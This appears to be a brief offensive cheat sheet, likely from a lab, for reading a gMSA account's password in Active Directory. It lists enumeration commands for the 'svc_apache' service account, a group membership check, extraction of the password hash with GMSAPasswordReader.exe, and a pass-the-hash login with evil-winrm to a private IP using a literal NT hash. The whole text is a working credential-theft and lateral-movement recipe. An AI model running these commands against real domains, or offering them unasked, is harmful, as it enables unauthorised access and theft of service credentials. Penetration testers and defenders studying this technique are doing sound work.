gMSA Password Read
Identify gMSA accounts
.\PowerView.ps1
Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,PrincipalsAllowedToRetrieveManagedPassword
Verify your group membership
Get-ADGroupMember 'Web Admins'
Read the gMSA password
.\GMSAPasswordReader.exe --AccountName 'svc_apache'
Login with the resulting NT hash
evil-winrm -i 192.168.81.165 -u svc_apache$ -H 4283B392D3647F3F26D614EE3AB9A80C